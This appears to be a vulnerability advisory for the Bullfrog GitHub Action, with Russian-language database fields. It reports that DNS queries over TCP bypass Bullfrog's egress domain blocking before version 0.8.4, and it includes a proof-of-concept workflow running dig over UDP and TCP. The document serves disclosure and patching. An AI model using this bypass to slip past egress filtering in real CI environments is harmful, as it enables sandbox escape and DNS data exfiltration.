Описание
Bullfrog's DNS over TCP bypasses domain filtering
Summary
Using tcp breaks blocking and allows DNS exfiltration.
PoC
name: test
on:
push:
branches:
- "*"
jobs:
testBullFrog:
runs-on: ubuntu-22.04
steps:
- name: Use google dns
run: |
sudo resolvectl dns eth0 1.1.1.1
resolvectl status
- name: Set up bullfrog to block everything
uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
with:
egress-policy: block
allowed-domains: |
*.github.com
- name: Test connectivity
run: |
echo testing udp allowed ..
dig api.github.com @1.1.1.1 || :
echo testing tcp allowed ..
dig api.github.com @1.1.1.1 +tcp || :
echo testing udp not allowed
dig api.google.com @1.1.1.1 || :
echo testing tcp not allowed
dig api.google.com @1.1.1.1 +tcp || :
Impact
sandbox bypass
Пакеты
Наименование
bullfrogsec/bullfrog
actions
Затронутые версииВерсия исправления
< 0.8.4
0.8.4
Связанные уязвимости
CVSS3: 6.2
nvd
9 месяцев назад
Bullfrog is a GithHb Action to block unauthorized outbound traffic in GitHub workflows. Prior to version 0.8.4, using tcp breaks blocking and allows DNS exfiltration. This can result in sandbox bypass. Version 0.8.4 fixes the issue.
CVSS3: 6.2
fstec
9 месяцев назад
Уязвимость инструмента блокировки несанкционированного исходящего трафика в рабочих процессах GitHub Bullfrog, связанная с раскрытием информации при передаче данных, позволяющая нарушителю обойти защитный механизм песочницы